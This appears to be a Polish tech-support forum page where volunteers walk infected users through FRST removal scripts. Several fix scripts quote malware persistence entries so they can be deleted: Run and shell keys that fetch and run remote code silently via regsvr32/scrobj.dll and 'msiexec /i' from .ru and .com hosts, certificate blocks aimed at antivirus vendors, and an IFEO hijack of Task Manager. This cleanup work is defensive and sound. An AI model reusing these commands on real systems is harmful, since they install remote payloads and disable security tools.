88AD5DFE24126872B33175D1778687B642323ACF (McAfee) HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software) HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.) HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.) HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security) HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.) HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG) HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd) HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET) HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ) HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation) HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation) HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro) HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab) HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security) HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software) HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.) HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ) HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL) HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET) HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L) HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.bjdnxbgp3.ru/setup.xml scrobj.dll HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Run: [background_fault] => C:\Users\And\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-06] (AVAST Software) HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj84N8EcOTYyRWhWMYNYMjU1NTlWFjq4M8E1NjHxMdhQRH== /q C:\Users\And\AppData\Local\background_fault HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494834163&z=5ad105cef59cf056d23a713gcz8taz9bdcdz7gaqac&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} SearchScopes: HKU\S-1-5-21-1391594616-1957220202-1850595550-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1495440636&z=1816b38e206bb99366246a4g3z0tew3z9zee7q8c6m&from=che0812&uid=3219913727_67194_F412129D&q={searchTerms} R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] S2 CSHMDR; C:\Users\And\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 CWASRE; C:\Users\And\AppData\Local\CWASRE\Snare.dll [830464 2017-05-15] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [101016 2017-05-17] () S2 NPASRE; C:\Users\And\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 snare; C:\Users\And\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S2 terana; C:\Users\And\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] R2 WinSAPSvc; C:\Users\And\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] C:\ProgramData\BIT C:\Users\And\AppData\Local\CSHMDR C:\Users\And\AppData\Local\CWASRE C:\Users\And\AppData\Local\NPASRE C:\Users\And\AppData\Local\snare C:\Users\And\AppData\Local\terana C:\ProgramData\Microsoft\AppV\sym\dbg.dll C:\Users\And\AppData\Roaming\WinSAPSvc 2017-05-24 11:08 - 2017-05-31 13:27 - 00001987 _____ C:\Users\And\Desktop\big_bang_empire.lnk 2017-05-24 11:08 - 2017-05-31 13:27 - 00001961 _____ C:\Users\And\Desktop\BigFarm.lnk 2017-05-09 12:16 - 2017-05-09 12:16 - 0016176 _____ () C:\Users\And\AppData\Local\InstallationConfiguration.xml 2017-05-09 12:16 - 2017-05-09 12:16 - 0140800 _____ () C:\Users\And\AppData\Local\installer.dat 2017-05-09 12:17 - 2017-05-09 12:17 - 0278509 _____ () C:\Users\And\AppData\Local\Ranrantouch.bin C:\Windows\Temp\gBAC6.tmp.exe C:\Users\And\zijkxhq.exe DeleteKey: HKCU\Software\Hotleaf DeleteKey: HKLM\SOFTWARE\WOW6432Node\Hotleaf DeleteKey: HKCU\Software\Firefox DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\And\AppData\Local CMD: dir /a C:\Users\And\AppData\LocalLow CMD: dir /a C:\Users\And\AppData\Roaming CMD: netsh advfirewall reset Hosts: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Kompleksowo wymień profile w przeglądarce Google Chrome oraz Mozilla FireFox. Otwórz Google Chrome następnie: Ustawienia > karta Ustawienia > Osoby > Dodaj Osobę > Załóż czysty profil > ponownie wejdź do sekcji Osoby i skasuj wszystkie stare profile. Kliknij klawisz z flagą Windows + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p lub "C:\Program Files\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. Utracisz wszystko z tych przeglądarek, więc ewentualnie możesz wyeksportować zakładki i ważne linki. Ważne, abyś którąś z powyższych przeglądarek ustawił jako domyślną - inaczej nie cofnie się modyfikacja infekcji. 4. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). hotleaf;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

W raportach brak oznak infekcji, drobną kosmetykę pomijam, bo jest ona na naprawdę mała i nieistotna. Sugeruję jednak pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. Temat przenoszę do działu Pozostałe zagadnienia komputerowe. Niepokoi mnie jednak poniższy plik oznaczony w raporcie jako zerobajtowy. Odpowiada on za sterowniki od karty sieciowej. C:\Windows\System32\Drivers\Qcamain10x64.sys Łącząc to z tym co napisałeś na temat zrywania połączenia wydaję się to być problemem wymagającym skorygowania. Przeinstaluj sterowniki karty sieciowej, pobierając najnowszą wersję ze strony producenta. Dodatkowo wykonaj weryfikacje poprzez SFC i dostarcz raport - KLIK.

Właściwie to nie pomogłem Ci zbyt wiele, ale w imieniu zespołu Fixitpc bardzo dziękuje za pomoc w utrzymaniu serwisu Zamykam.

Bez raportów to jak wróżenie z fusów. 1. Poproszę o zestaw raportów systemowych FRST. 2. Uruchom SystemLook i w oknie wklej: :reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList /s HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts /s Następnie kliknij w Look. Momentalnie wyskoczy okno z raportem - dostarcz go.

Całość pomyślnie wykonana. Wygląda to już o wiele lepiej. Poprawki, czyli kasacja szczątkowych wpisów oraz reinstalacja przeglądarki ze względu na modyfikacje preferencji. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CreateRestorePoint: DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{B7CB7055-EFAE-4CD2-928A-15DB5F4FF7C7} DeleteKey: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\502c3617_0 DeleteKey: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\180eb0f9_0 DeleteValue: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Doeye\Application\chrome.exe C:\Users\Karina\AppData\Local\CWASRE C:\Users\Karina\AppData\Local\snare C:\Users\Karina\AppData\Local\VNASRE C:\Users\Karina\AppData\Local\WindowsUpdate C:\Users\Karina\AppData\Roaming\SSMgre C:\Users\Karina\AppData\Roaming\WinSAPSvc C:\Users\Karina\AppData\Roaming\WMM C:\Program Files\MK C:\Program Files (x86)\AlphaGo C:\Users\Public\Documents\report.dat C:\Users\Public\Documents\temp.dat C:\Windows\SysWOW64\last.dump Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Kompleksowo wg poniższej instrukcji przeinstaluj przeglądarkę Google Chrome. Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome (czyli Panel Sterowanie > Odinstaluj program). Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 3. Uruchom AdwCleaner. Na razie wybierz tylko opcję Szukaj (nie stosuj jeszcze Oczyść) i dostarcz log z folderu C:\AdwCleaner.

Pomimo zgłaszanej pomyłki całość została poprawnie wykonana i wygląda to już porządku. 1. Detekcje AdwCleaner daj do kasacji. 2. Sugeruję również pobrać inny klient torrent (np. qBittorent), gdyż w systemie widać reklamotwórczy uTorrent, ten wg mnie nadaje się do deinstalacji. 3. Wykonaj poniższy krok tj. poprzednio w pkt. 2, tylko podmień zawartość skryptu na: HKLM\...\RunOnce: [*EmptyTemp] => cmd /c rd /q/s C:\FRST\Temp HKU\S-1-5-21-1153295470-385941625-2631502423-1000\...\Run: [F4681E62B692F24B8632DD44178954A1FBE3F622._service_run] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1143640 2017-05-09] (Google Inc.) BootExecute: autocheck autochk * sdnclean64.exe Reboot: Piszesz, że nic się nie dzieje z komputerem, co podkłada się z tym co ja widzę w raportach. Kończymy, otwórz temat finalizacji i wykonaj poniższe kroki. Zastosuj DelFix, który odinstaluj używane narzędzia oraz skasuj raporty z nimi związane. Zaktualizuj wszystkie oprogramowanie zewnętrze. Sprawdź czy masz aktualny system Windows, jeśli nit to obowiązkowo zaktualizuj go.

Przepraszam, bo zasugerowałem się zbyt mocno nazwą tematu, która jest lekko niepoprawna. Skoro znalazłeś rozwiązanie problemu to temat zamykam.

Przeglądarki Mozilla FireFox oraz Google Chrome zostały zainfekowane w nowoczesny sposób, czyli poprzez wstawienie sfałszowanych kopii. Oprócz tego widoczne są inne, liczne modyfikacje infekcji. Szkodliwe usługi, skróty i wiele, wiele więcej. Do poczytania, na przyszłość: KLIK. 1. Deinstalacje. Przez panel sterowania odinstaluj program sponsorski / adware: Booking.com version 1.3.0.5019. Za pomocą narzędzia Program Install and Uninstall Troubleshooter odinstaluj: AlphaGo. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) RemoveDirectory: C:\Program Files (x86)\Doeye RemoveDirectory: C:\Users\Karina\AppData\Roaming\Doeye RemoveDirectory: C:\Users\Karina\AppData\Local\Doeye HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\ChromeHTML: -> C:\Program Files (x86)\Doeye\Application\chrome.exe (Google Inc.) Task: {13690C54-20FE-49E5-A944-39D79AD0407A} - \Windows-WoShiBeiYongDe -> Brak pliku Task: {46A26F52-4E73-4BCB-B637-FFD9196D3FEB} - System32\Tasks\{3E25F6F0-6803-4AAC-B178-F396B088A027} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\ Task: {BF80DEA7-CCB8-44B0-B7CA-5782941C5169} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () Task: {C51E8FD3-3718-403F-9F81-412FE2398FFB} - System32\Tasks\{A9A47BEE-1E85-4D3D-B0C7-052BA71A97AC} => pcalua.exe -a F:\AHDETH-00244228-0042.EXE -d F:\ Task: {C819146A-746A-4407-AC0D-60656A2D87CE} - \PowerWord-SCT-JT -> Brak pliku RemoveDirectory: C:\Program Files (x86)\MIO ShortcutWithArgument: C:\Users\Karina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1495644570&z=91de134c1d6e8157ba43528g7z0t3wbq6z3z0wamee&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk FirewallRules: [{1E2ED7E9-AFC7-4C03-8527-833431621303}] => (Allow) C:\Program Files (x86)\Doeye\Application\chrome.exe FirewallRules: [{DB9613CB-AD37-472E-B87A-F92D20075629}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{4AB25F3B-02D3-49F3-8ED0-70762CA84090}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{D9BA6956-3BF0-46BA-849B-E07952409818}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat FirewallRules: [{A40AE860-8FA6-4F17-87E1-2C71CE084CE8}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmk6459gsxp_z1i3s3j5sxxz1i3s3j5s.dat RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Users\Karina\AppData\Roaming\Firefox RemoveDirectory: C:\Users\Karina\AppData\Local\Firefox HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Run: [background_fault] => C:\Users\Karina\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-09] (AVAST Software) C:\Users\Karina\AppData\Local\background_fault HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj83MUM4NYVWRjRYFTF5OTRWOWzLFjQLFdk1NdH1RjVYFq== /q IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://myhome.vi-view.com/web/?type=ds&ts=1418157036&from=cor&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S HKU\S-1-5-21-1638026617-3475964013-2229430397-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} SearchScopes: HKU\S-1-5-21-1638026617-3475964013-2229430397-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1494341017&z=db9922b5cba92e6ab408e73g9zft0z5cdzagde0gbb&from=che0812&uid=TOSHIBAXMK6459GSXP_Z1I3S3J5SXXZ1I3S3J5S&q={searchTerms} FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Karina\AppData\Roaming\Mozilla\Firefox\Profiles\v9t3imds.default-1449957172719\extensions\arthurj8283@gmail.com CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll Brak pliku S4 ANSARE; C:\Users\Karina\AppData\Local\ANSARE\Snare.dll [826368 2017-05-24] () [brak podpisu cyfrowego] R2 AppleCloudSvc; C:\ProgramData\Apple\Common\Cloud\WinHelper.dll [110592 2017-04-24] () [brak podpisu cyfrowego] R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-31] (TODO: ) [brak podpisu cyfrowego] R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [99480 2017-05-26] () S4 NPASRE; C:\Users\Karina\AppData\Local\NPASRE\Snare.dll [830464 2017-05-24] () [brak podpisu cyfrowego] S2 terana; C:\Users\Karina\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] S4 VNASRE; C:\Users\Karina\AppData\Local\VNASRE\Snare.dll [826368 2017-05-24] () [brak podpisu cyfrowego] C:\Users\Karina\AppData\Local\ANSARE C:\ProgramData\Apple C:\ProgramData\BIT C:\Users\Karina\AppData\Local\NPASRE C:\Users\Karina\AppData\Local\terana S1 ccnfd_1_10_0_4; system32\drivers\ccnfd_1_10_0_4.sys [X] S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] C:\Program Files (x86)\Elex-tech 2017-05-27 17:57 - 2017-05-27 17:57 - 00000000 _____ C:\Windows\SysWOW64\55 2017-05-27 17:57 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\33 2017-05-27 17:56 - 2017-05-13 01:13 - 00000000 _____ C:\Windows\SysWOW64\00 2017-05-27 17:56 - 2017-05-09 22:49 - 00000000 _____ C:\Windows\SysWOW64\1111 2017-05-27 17:56 - 2017-04-25 13:05 - 00000000 _____ C:\Windows\SysWOW64\11 2017-05-27 17:56 - 2017-04-25 13:00 - 00000000 ____D C:\Program Files (x86)\BiaoJi C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Office\Niedawny\Nowy dokument sformatowany (2).LNK C:\Users\Karina\Desktop\BigFarm.lnk C:\Users\Karina\Desktop\big_bang_empire.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Karina\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User 